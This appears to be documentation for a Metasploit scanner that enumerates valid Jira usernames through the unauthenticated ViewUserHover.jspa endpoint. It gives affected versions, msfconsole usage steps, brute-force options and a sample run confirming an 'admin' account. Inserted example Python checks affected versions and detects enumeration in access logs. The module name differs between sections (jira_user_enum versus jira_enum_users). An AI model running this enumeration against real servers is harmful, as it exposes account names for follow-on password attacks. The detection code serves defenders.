Vulnerable Application
Jira is team management software for agile teams.
This module has been tested successfully on:
- Jira version 8.4.1 on Ubuntu Linux.
- Jira version 8.4.1 on Kali Linux.
- Jira version 8.5.6 on Ubuntu Linux.
- Jira version 8.10.1 on Ubuntu Linux.
- Jira version 8.11.0 on Ubuntu Linux.
Installers:
- Jira Installers
- [Jira Installers Archive](https://www.atlassian.com/software/jira/download-archives)
Description
The module exploits an information disclosure vulnerability that allows an unauthenticated user to enumerate valid usernames through the /secure/ViewUserHover.jspa endpoint. This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, and 8.6.0 ≤ version < 8.11.1. Discovered by Mikhail Klyuchnikov (@mn1): https://twitter.com/ptswarm/status/1318914772918767619
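Two checks a defender would want for the issue described above, added here as example code that is not part of the module or its documentation: a test of whether a reported Jira version falls inside the affected ranges quoted in the description, and a detector that reads web-server access logs for one client probing `/secure/ViewUserHover.jspa` with many distinct `username` values. The log lines and IP addresses are constructed for the example.

```python
import re
from collections import defaultdict

# Affected ranges exactly as the description states them:
# < 7.13.16, 8.0.0 <= version < 8.5.7, 8.6.0 <= version < 8.11.1 (half-open intervals)
AFFECTED_RANGES = [
    ((0, 0, 0), (7, 13, 16)),
    ((8, 0, 0), (8, 5, 7)),
    ((8, 6, 0), (8, 11, 1)),
]

def parse_version(text):
    """'8.5.6' -> (8, 5, 6); tuple comparison orders versions numerically."""
    return tuple(int(part) for part in text.strip().split("."))

def is_affected(version):
    """True if the given Jira version is inside one of the affected ranges."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)

# Constructed sample access log (common log format); hypothetical hosts and clients.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Oct/2020:10:00:01 +0000] "GET /secure/ViewUserHover.jspa?username=admin HTTP/1.1" 200 512
10.0.0.5 - - [20/Oct/2020:10:00:02 +0000] "GET /secure/ViewUserHover.jspa?username=jsmith HTTP/1.1" 200 312
10.0.0.5 - - [20/Oct/2020:10:00:02 +0000] "GET /secure/ViewUserHover.jspa?username=bob HTTP/1.1" 200 312
10.0.0.9 - - [20/Oct/2020:10:00:05 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 9000
10.0.0.9 - - [20/Oct/2020:10:00:06 +0000] "GET /secure/ViewUserHover.jspa?username=alice HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Match the endpoint and pull the username parameter out of the query string.
HOVER_RE = re.compile(r"^/secure/ViewUserHover\.jspa\?(?:.*&)?username=([^&]+)")

def find_enumeration(log_text, threshold=3):
    """Return {client_ip: sorted distinct usernames} for clients that queried
    ViewUserHover.jspa for at least `threshold` distinct usernames."""
    probes = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        hit = HOVER_RE.match(m.group("path"))
        if hit:
            probes[m.group("ip")].add(hit.group(1))
    return {ip: sorted(names) for ip, names in probes.items() if len(names) >= threshold}

if __name__ == "__main__":
    for ver in ("8.4.1", "8.5.7", "8.11.1"):
        print(ver, "affected" if is_affected(ver) else "not affected")
    print(find_enumeration(SAMPLE_LOG))
```

The threshold is deliberately low for the sample; in production, scope it per client over a time window and note that the normal hover card is requested by logged-in users for a handful of names, not dozens.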
Verification Steps
- Start `msfconsole`
- Do: `use auxiliary/scanner/http/jira_user_enum`
- Do: `set rhosts [IP]`
- Do: `set SSL true`
- Do: `set RPORT 443`
- Do: `set USERNAME [username]`
- Do: `run`
- You should find out whether the user exists or not.
Options
- BRUTEFORCE_SPEED - How fast to bruteforce, from 0 to 5
- RHOSTS - The Target host(s)
- RPORT - Remote port hosting the Jira Application
- TARGETURI - Path to Jira install on the webserver
- USERNAME - single username to attempt to enumerate
- USER_FILE - File of usernames to attempt to enumerate
Scenarios
```
msf6 > use auxiliary/scanner/http/jira_enum_users
msf6 auxiliary(scanner/http/jira_enum_users) > set rhosts 192.168.0.101
rhosts => 192.168.0.101
msf6 auxiliary(scanner/http/jira_enum_users) > set USERNAME admin
msf6 auxiliary(scanner/http/jira_enum_users) > run
[*] Begin enumerating users at 192.168.0.101/secure/ViewUserHover.jspa?username=
[*] checking user admin
[+] 'User exists: admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/jira_enum_users) > creds
Credentials
===========

host           origin         service      public  private  realm  private_type  JtR Format
----           ------         -------      ------  -------  -----  ------------  ----------
192.168.0.101  192.168.0.101  443/tcp (jira)  admin
```